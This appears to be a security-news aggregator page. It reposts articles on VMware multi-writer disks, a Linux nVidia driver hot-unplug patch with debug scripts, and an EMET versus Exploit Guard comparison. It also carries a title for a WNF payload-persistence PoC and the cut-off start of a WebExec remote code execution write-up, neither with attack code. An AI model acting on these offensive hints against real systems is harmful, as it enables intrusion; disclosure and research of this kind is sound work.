PoC for persisting .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls. — PoC example
VMware virtual disk (VMDK) in Multi Write Mode
( original text by David Pasek )
VMFS is a clustered file system that disables (by default) multiple virtual machines from opening and writing to the same virtual disk (vmdk file). This prevents more than one virtual machine from inadvertently accessing the same vmdk file. This is the safety mechanism to avoid data corruption in cases where the applications in the virtual machine do not maintain consistency in the writes performed to the shared disk. However, you might have some third-party cluster-aware application, where the multi-writer option allows VMFS-backed disks to be shared by multiple virtual machines and leverage third-party OS/App cluster solutions to share a single VMDK disk on VMFS filesystem. These third-party cluster-aware applications, in which the applications ensure that writes originate from multiple different virtual machines, does not cause data loss. Examples of such third-party cluster-aware applications are Oracle RAC, Veritas Cluster Filesystem, etc.
There is VMware KB “Enabling or disabling simultaneous write protection provided by VMFS using the multi-writer flag (1034165)” available at https://kb.vmware.com/kb/1034165 KB describes how to enable or disable simultaneous write protection provided by VMFS using the multi-writer flag. It is the official resource how to use multi-write flag but the operational procedure is a little bit obsolete as vSphere 6.x supports configuration from WebClient (Flash) or vSphere Client (HTML5) GUI as highlighted in the screenshot below.
However, KB 1034165 contains several important limitations which should be considered and addressed in solution design. Limitations of multi-writer mode are:
- The virtual disk must be eager zeroed thick; it cannot be zeroed thick or thin provisioned.
- Sharing is limited to 8 ESXi/ESX hosts with VMFS-3 (vSphere 4.x) and VMFS-5 (vSphere 5.x) and VMFS-6 in multi-writer mode.
- Hot adding a virtual disk removes Multi-Writer Flag.
Let’s focus on 8 ESXi host limit. The above statement about scalability is a little bit unclear. That’s the reason why one of my customers has asked me what does it really mean. I did some research on internal VMware resources and fortunately enough I’ve found internal VMware discussion about this topic, so I think sharing the info about this topic will help to broader VMware community.
Here is 8 host limit explanation in other words …
“8 host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. This limitation applies to a group of VMs sharing the same VMDK file for a particular instance of the cluster-aware application. In case, you need to consolidate multiple application clusters into a single vSphere cluster, you can safely do it and app nodes from one app cluster instance can run on other ESXi nodes than app nodes from another app cluster instance. It means that if you have more than one app cluster instance, all app cluster instances can leverage resources from more than 8 ESXi hosts in vSphere Cluster.”
The best way to fully understand specific behavior is to test it. That’s why I have a pretty decent home lab. However, I do not have 10 physical ESXi host, therefore I have created a nested vSphere environment with vSphere Cluster having 9 ESXi hosts. You can see vSphere cluster with two App Cluster Instances (App1, App2) on the screenshot below.
Application Cluster instance App1 is composed of 9 nodes (9 VMs) and App2 instance just from 2 nodes. Each instance is sharing their own VMDK disk. The whole test infrastructure is conceptually depicted on the figures below.
Test Step 1: I have started 8 of 9 VMs of App1 cluster instance on 8 ESXi hosts (ESXi01-ESXi08). Such setup works perfectly fine as there is 1 to 1 mapping between VMs and ESX hosts within the limit of 8 ESXi hosts having shared VMDK1 opened.
Test Step 2: Next step is to test the Power-On operation of App1-VM9 on ESXi09. Such operation fails. This is expected result because 9th ESXi host cannot open the VMDK1 file on VMFS datastore.
The error message is visible on the screenshot below.
Test Step 3: Next step is to Power On App1-VM9 on ESXi01. This operation is successful as two app cluster nodes (virtual machines App1-VM1 and App1-VM9) are running on single ESXi host (ESX01) therefore only 8 ESXi hosts have the VMDK1 file open and we are in the supported limits.
Test Step 4: Let’s test vMotion of App1-VM9 from ESXi01 to ESX09. Such operation fails. This is expected result because of the same reason as on Power-On operation. App1 Cluster instance would be stretched across 9 ESXi hosts but 9thESXi host cannot open VMDK1 file on VMFS datastore.
The error message is a little bit different but the root cause is the same.
Test Step 5: Let’s test vMotion of App2-VM2 from ESXi08 to ESX09. Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit.
Test step 6: The last test is the vMotion of App2-VM2 from vSphere Cluster (ESXi08) to standalone ESXi host outside of the vSphere cluster (ESX01). Such operation works because App2 Cluster instance is still stretched across two ESXi hosts only so it is within supported 8 ESXi hosts limit. vSphere cluster is not the boundary for multi-write VMDK mode.
FAQ
Q: What exactly does it mean the limitation of 8 ESXi hosts?
A: 8 ESXi host limit implies how many ESXi hosts can simultaneously open the same virtual disk (aka VMDK file). If the cluster-aware application is not going to have more than 8 nodes, it works and it is supported. Details and various scenarios are described in this article.
Q: Where are stored the information about the locks from ESXi hosts?
A: The normal VMFS file locking mechanism is in use, therefore there are VMFS file locks which can be displayed by ESXi command: vmkfstools -D
The only difference is that multi-write VMDKs can have multiple locks as is shown in the screenshot below.
Q: Is it supported to use DRS rules for vmdk multi-write in case that is more than 8 ESXi hosts in the cluster where VMs with configured multi-write vmdks are running?
A: Yes. It is supported. DRS rules can be beneficial to keep all nodes of the particular App Cluster Instance on specified ESXi hosts. This is not necessary nor required from the technical point of view, but it can be beneficial from a licensing point of view.
Q: How ESXi life cycle can be handled with the limit 8 ESXi hosts?
A: Let’s discuss specific VM operations and supportability of multi-write vmdk configuration. The source for the answers is VMware KB https://kb.vmware.com/kb/1034165
- Power on, off, restart virtual machine – supported
- Suspend VM – unsupported
- Hot add virtual disks — only to existing adapters
- Hot remove devices – supported
- Hot extend virtual disk – unsupported
- Connect and disconnect devices – supported
- Snapshots – unsupported
- Snapshots of VMs with independent-persistent disks – supported
- Cloning – unsupported
- Storage vMotion – unsupported
- Changed Block Tracking (CBT) – unsupported
- vSphere Flash Read Cache (vFRC) – unsupported
- vMotion – supported by VMware for Oracle RAC only and limited to 8 ESX/ESXi hosts. Note: other cluster-aware applications are not supported by VMware but can be supported by partners. For example, Veritas products have supportability documented here https://sort.veritas.com/public/documents/sfha/6.2/vmwareesx/productguides/html/sfhas_virtualization/ch01s05s01.htm Please, verify current supportability directly with specific partners.
Q: Is it possible to migrate VMs with multi-write vmdks to different cluster when it will be offline?
A: Yes. VM can be Shut Down or Power Off and Power On on any ESXi host outside of the vSphere cluster. The only requirement is to have the same VMFS datastore available on source and target ESXi host. Please, keep in mind that the maximum supported number of ESXi hosts connected to a single VMFS datastore is 64.
Patching nVidia GPU driver for hot-unplug on Linux
( original text by @whitequark )

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.
Turns out, there are only a few issues preventing functional hot-unplug.
- In
nvidia_remove
, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling
os_schedule()while having taken the
NV_LINUX_DEVICESlock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of
NV_CHECK_PCI_CONFIG_SPACEtaking the same lock (in
verify_pci_bars, passing the
NVreg_CheckPCIConfigSpace=0module option eliminates that accidental safety mechanism, and allows reentrant requests to proceed. They do not crash due to memory being deallocated in
nvidia_remove(so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
- The NVKMS component (in the
nvidia-modeset
module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the
/dev/nvidia-modesetfile. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to
dmesgsimilar to
nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
- The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the
nvidia-modeset
module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each
/dev/nvidia-modesetfd with the GPU bus ID.
- When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.
All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns
in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)
After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the
kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!
Here’s the patch, written against the
Debian source package:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 |
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h --- original/common/inc/nv-linux.h 2018-09-23 12:20:02.000000000 +0000 +++ patched/common/inc/nv-linux.h 2018-10-28 07:19:21.526566940 +0000 @@ -1465,6 +1465,7 @@ typedef struct nv_linux_state_s { nv_state_t nv_state; atomic_t usage_count; + atomic_t dead; struct pci_dev *dev; diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h --- original/common/inc/nv-modeset-interface.h 2018-08-22 00:55:23.000000000 +0000 +++ patched/common/inc/nv-modeset-interface.h 2018-10-28 07:22:00.768238371 +0000 @@ -25,6 +25,8 @@ #include "nv-gpu-info.h" +#include <asm/atomic.h> + /* * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from * core RM, which uses the calling convention of arguments on the @@ -115,6 +117,8 @@ int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb); + atomic_t * (*gpu_dead)(NvU32 gpu_id); + } nvidia_modeset_rm_ops_t; NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops); diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h --- original/common/inc/nv-proto.h 2018-08-22 00:55:23.000000000 +0000 +++ patched/common/inc/nv-proto.h 2018-10-28 07:20:49.939494812 +0000 @@ -81,6 +81,7 @@ NvBool nvidia_get_gpuid_list (NvU32 *gpu_ids, NvU32 *gpu_count); int nvidia_dev_get (NvU32, nvidia_stack_t *); void nvidia_dev_put (NvU32, nvidia_stack_t *); +atomic_t * nvidia_dev_dead (NvU32); int nvidia_dev_get_uuid (const NvU8 *, nvidia_stack_t *); void nvidia_dev_put_uuid (const NvU8 *, nvidia_stack_t *); int nvidia_dev_get_pci_info (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *); diff -ur original/nvidia/nv.c patched/nvidia/nv.c --- original/nvidia/nv.c 2018-09-23 12:20:02.000000000 +0000 +++ patched/nvidia/nv.c 2018-10-28 07:48:05.895025112 +0000 @@ -1944,6 +1944,12 @@ unsigned int i; NvBool bRemove = NV_FALSE; + if (NV_ATOMIC_READ(nvl->dead)) + { + nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n", + current->pid); + } + NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP()); /* for control device, just jump to its open routine */ @@ -2106,6 +2112,12 @@ size_t arg_size; int arg_cmd; + if (NV_ATOMIC_READ(nvl->dead)) + { + nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n", + current->pid); + } + nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n", _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd)); @@ -3217,6 +3229,7 @@ NV_INIT_MUTEX(&nvl->ldata_lock); NV_ATOMIC_SET(nvl->usage_count, 0); + NV_ATOMIC_SET(nvl->dead, 0); if (!rm_init_event_locks(sp, nv)) return NV_FALSE; @@ -4018,14 +4031,38 @@ nv_printf(NV_DBG_ERRORS, "NVRM: Attempting to remove minor device %u with non-zero usage count!\n", nvl->minor_num); + nv_printf(NV_DBG_ERRORS, + "NVRM: YOLO, waiting for usage count to drop to zero\n"); WARN_ON(1); - /* We can't continue without corrupting state, so just hang to give the - * user some chance to do something about this before reboot */ - while (1) + NV_ATOMIC_SET(nvl->dead, 1); + + /* Insanity check: wait until all clients die, then hope for the best. */ + while (1) { + UNLOCK_NV_LINUX_DEVICES(); os_schedule(); - } + LOCK_NV_LINUX_DEVICES(); + + nvl = pci_get_drvdata(dev); + if (!nvl || (nvl->dev != dev)) + { + goto done; + } + + if (NV_ATOMIC_READ(nvl->usage_count) == 0) + { + break; + } + } + nv_printf(NV_DBG_ERRORS, + "NVRM: Usage count is now zero, proceeding to remove the GPU\n"); + nv_printf(NV_DBG_ERRORS, + "NVRM: This is not actually supposed to work lol. Hope it does tho ????\n"); + nv_printf(NV_DBG_ERRORS, + "NVRM: You probably want to reload nvidia-modeset now if you want any " + "of this to ever start up again, but like, man, that's your choice entirely\n"); + } nv = NV_STATE_PTR(nvl); if (nvl == nv_linux_devices) nv_linux_devices = nvl->next; @@ -4712,6 +4749,22 @@ up(&nvl->ldata_lock); } +atomic_t *nvidia_dev_dead(NvU32 gpu_id) +{ + nv_linux_state_t *nvl; + atomic_t *ret; + + /* Takes nvl->ldata_lock */ + nvl = find_gpu_id(gpu_id); + if (!nvl) + return NV_FALSE; + + ret = &nvl->dead; + up(&nvl->ldata_lock); + + return ret; +} + /* * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may * trigger initialization and teardown of unrelated devices to look up their diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c --- original/nvidia/nv-modeset-interface.c 2018-08-22 00:55:22.000000000 +0000 +++ patched/nvidia/nv-modeset-interface.c 2018-10-28 07:20:25.959243110 +0000 @@ -114,6 +114,7 @@ .close_gpu = nvidia_dev_put, .op = rm_kernel_rmapi_op, /* provided by nv-kernel.o */ .set_callbacks = nvidia_modeset_set_callbacks, + .gpu_dead = nvidia_dev_dead, }; if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0) diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c --- original/nvidia-modeset/nvidia-modeset-linux.c 2018-09-23 12:20:02.000000000 +0000 +++ patched/nvidia-modeset/nvidia-modeset-linux.c 2018-10-28 07:47:14.738703417 +0000 @@ -75,6 +75,9 @@ static struct semaphore nvkms_lock; +static NvU32 clopen_gpu_id; +static NvBool leak_on_unload; + /************************************************************************* * NVKMS executes queued work items on a single kthread. *************************************************************************/ @@ -89,6 +92,9 @@ struct nvkms_per_open { void *data; + NvU32 gpu_id; + atomic_t *gpu_dead; + enum NvKmsClientType type; union { @@ -711,6 +717,9 @@ nvidia_modeset_stack_ptr stack = NULL; NvBool ret; + printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n", + gpuId, current->pid); + if (__rm_ops.alloc_stack(&stack) != 0) { return NV_FALSE; } @@ -719,6 +728,10 @@ __rm_ops.free_stack(stack); + if (ret) { + clopen_gpu_id = gpuId; + } + return ret; } @@ -726,12 +739,17 @@ { nvidia_modeset_stack_ptr stack = NULL; + printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n", + gpuId, current->pid); + if (__rm_ops.alloc_stack(&stack) != 0) { return; } __rm_ops.close_gpu(gpuId, stack); + clopen_gpu_id = gpuId; + __rm_ops.free_stack(stack); } @@ -771,8 +789,14 @@ popen->type = type; + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n", + current->pid); + *status = down_interruptible(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n", + current->pid); + if (*status != 0) { goto failed; } @@ -781,6 +805,9 @@ up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n", + current->pid); + if (popen->data == NULL) { *status = -EPERM; goto failed; @@ -799,10 +826,16 @@ *status = 0; + printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n", + current->pid); + return popen; failed: + printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n", + current->pid); + nvkms_free(popen, sizeof(*popen)); return NULL; @@ -816,14 +849,36 @@ * mutex. */ + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n", + current->pid); + down(&nvkms_lock); - nvKmsClose(popen->data); + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n", + current->pid); + + if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) { + printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 " + "in nvkms_close_common, pid %d\n", + current->pid); + + nvkms_close_gpu(popen->gpu_id); + + popen->gpu_id = 0; + popen->gpu_dead = NULL; + + leak_on_unload = NV_TRUE; + } else { + nvKmsClose(popen->data); + } popen->data = NULL; up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n", + current->pid); + if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) { /* * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work @@ -844,6 +899,9 @@ } nvkms_free(popen, sizeof(*popen)); + + printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n", + current->pid); } int NVKMS_API_CALL nvkms_ioctl_common @@ -855,20 +913,58 @@ int status; NvBool ret; + printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n", + current->pid); + status = down_interruptible(&nvkms_lock); if (status != 0) { return status; } + printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n", + current->pid); + + if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) { + goto dead; + } + + clopen_gpu_id = 0; + if (popen->data != NULL) { ret = nvKmsIoctl(popen->data, cmd, address, size); } else { ret = NV_FALSE; } + if (clopen_gpu_id != 0) { + if (!popen->gpu_id) { + printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, " + "pid %d\n", clopen_gpu_id, current->pid); + popen->gpu_id = clopen_gpu_id; + popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id); + } else { + printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, " + "pid %d\n", clopen_gpu_id, current->pid); + popen->gpu_id = 0; + popen->gpu_dead = NULL; + } + } + up(&nvkms_lock); + printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n", + current->pid); + return ret ? 0 : -EPERM; + +dead: + up(&nvkms_lock); + + printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this " + "in nvkms_ioctl_common, pid %d\n", + current->pid); + + return -ENOENT; } /************************************************************************* @@ -1239,9 +1335,14 @@ nvkms_proc_exit(); - down(&nvkms_lock); - nvKmsModuleUnload(); - up(&nvkms_lock); + if(leak_on_unload) { + printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? " + "haha nvm wasnt a question. in nvkms_exit\n"); + } else { + down(&nvkms_lock); + nvKmsModuleUnload(); + up(&nvkms_lock); + } /* * At this point, any pending tasks should be marked canceled, but |
Here’s some handy scripts I was using while debugging it:
1 2 3 4 5 |
#!/bin/sh -ex modprobe acpi_ipmi insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0 insmod nvidia-modeset.ko dmesg -w |
1 2 3 |
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
|
1 2 |
#!/bin/sh exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules |
And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
[ 219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module 390.87 Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts) [ 219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms 390.87 Tue Aug 21 16:16:14 PDT 2018 [ 224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560 [ 224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560 [ 239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a [ 239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus. [ 239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus. [ 239.061398] NVRM: A GPU crash dump has been created. If possible, please run NVRM: nvidia-bug-report.sh as root to collect this data before NVRM: the NVIDIA kernel module is unloaded. [ 240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count! [ 240.209501] NVRM: YOLO, waiting for usage count to drop to zero [ 241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560 [ 241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560 [ 241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560 [ 250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU [ 250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho ???? [ 250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely [ 250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0 [ 250.440950] pci_bus 0000:06: busn_res: [bus 06] is released [ 250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released [ 250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released [ 251.000794] pci_bus 0000:02: Allocating resources [ 251.001324] pci_bus 0000:02: Allocating resources [ 253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0 [ 253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID) [ 253.765976] pcieport 0000:00:1c.0: device [8086:9d10] error status/mask=00002001/00002000 [ 253.765982] pcieport 0000:00:1c.0: [ 0] Receiver Error (First) [ 253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3 [ 253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3 [ 253.846177] pci_bus 0000:03: busn_res: [bus 03] is released [ 253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released [ 253.846300] pci_bus 0000:39: busn_res: [bus 39] is released [ 253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released [ 353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit [ 357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms 390.87 Tue Aug 21 16:16:14 PDT 2018 |
1 |
[ 244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210) |
Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard
Important
If you are currently using EMET, you should be aware that EMET reached end of life on July 31, 2018. You should consider replacing EMET with exploit protection in Windows Defender ATP.
You can convert an existing EMET configuration file into Exploit protection to make the migration easier and keep your existing settings.
This topic describes the differences between the Enhance Mitigation Experience Toolkit (EMET) and exploit protection in Windows Defender ATP.
Exploit protection in Windows Defender ATP is our successor to EMET and provides stronger protection, more customization, an easier user interface, and better configuration and management options.
EMET is a standalone product for earlier versions of Windows and provides some mitigation against older, known exploit techniques.
After July 31, 2018, it will not be supported.
For more information about the individual features and mitigations available in Windows Defender ATP, as well as how to enable, configure, and deploy them to better protect your network, see the following topics:
Feature comparison
The table in this section illustrates the differences between EMET and Windows Defender Exploit Guard.
Windows Defender Exploit Guard | EMET | |
---|---|---|
Windows versions | All versions of Windows 10 starting with version 1709 | Windows 8.1; Windows 8; Windows 7 Cannot be installed on Windows 10, version 1709 and later |
Installation requirements | Windows Security in Windows 10 (no additional installation required) Windows Defender Exploit Guard is built into Windows — it doesn’t require a separate tool or package for management, configuration, or deployment. |
Available only as an additional download and must be installed onto a management device |
User interface | Modern interface integrated with the Windows Security app | Older, complex interface that requires considerable ramp-up training |
Supportability | Dedicated submission-based support channel[1] Part of the Windows 10 support lifecycle |
Ends after July 31, 2018 |
Updates | Ongoing updates and development of new features, released twice yearly as part of the Windows 10 semi-annual update channel | No planned updates or development |
Exploit protection | All EMET mitigations plus new, specific mitigations (see table) Can convert and import existing EMET configurations |
Limited set of mitigations |
Attack surface reduction[2] | Helps block known infection vectors Can configure individual rules |
Limited ruleset configuration only for modules (no processes) |
Network protection[2] | Helps block malicious network connections | Not available |
Controlled folder access[2] | Helps protect important folders Configurable for apps and folders |
Not available |
Configuration with GUI (user interface) | Use Windows Security app to customize and manage configurations | Requires installation and use of EMET tool |
Configuration with Group Policy | Use Group Policy to deploy and manage configurations | Available |
Configuration with shell tools | Use PowerShell to customize and manage configurations | Requires use of EMET tool (EMET_CONF) |
System Center Configuration Manager | Use Configuration Manager to customize, deploy, and manage configurations | Not available |
Microsoft Intune | Use Intune to customize, deploy, and manage configurations | Not available |
Reporting | With Windows event logs and full audit mode reporting Full integration with Windows Defender Advanced Threat Protection |
Limited Windows event log monitoring |
Audit mode | Full audit mode with Windows event reporting | Limited to EAF, EAF+, and anti-ROP mitigations |
(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.
(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender Exploit Guard requirements for more details. Customizable mitigation options that are configured with Exploit protection do not require Windows Defender Antivirus.
Mitigation comparison
The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection feature.
The table in this section indicates the availability and support of native mitigations between EMET and Exploit protection.
Mitigation | Available in Windows Defender Exploit Guard | Available in EMET |
---|---|---|
Arbitrary code guard (ACG) | As «Memory Protection Check» | |
Block remote images | As «Load Library Check» | |
Block untrusted fonts | ||
Data Execution Prevention (DEP) | ||
Export address filtering (EAF) | ||
Force randomization for images (Mandatory ASLR) | ||
NullPage Security Mitigation | Included natively in Windows 10 See Mitigate threats by using Windows 10 security features for more information |
|
Randomize memory allocations (Bottom-Up ASLR) | ||
Simulate execution (SimExec) | ||
Validate API invocation (CallerCheck) | ||
Validate exception chains (SEHOP) | ||
Validate stack integrity (StackPivot) | ||
Certificate trust (configurable certificate pinning) | Windows 10 provides enterprise certificate pinning | |
Heap spray allocation | Ineffective against newer browser-based exploits; newer mitigations provide better protection See Mitigate threats by using Windows 10 security features for more information |
|
Block low integrity images | ||
Code integrity guard | ||
Disable extension points | ||
Disable Win32k system calls | ||
Do not allow child processes | ||
Import address filtering (IAF) | ||
Validate handle usage | ||
Validate heap integrity | ||
Validate image dependency integrity |
Note
The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, which other EMET advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations for a process.
See the Mitigation threats by using Windows 10 security features for more information on how Windows 10 employs existing EMET technology.
Technical Rundown of WebExec
This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».
The summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.
High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.
Credit
This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.
If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!
You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!
Intro
During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!
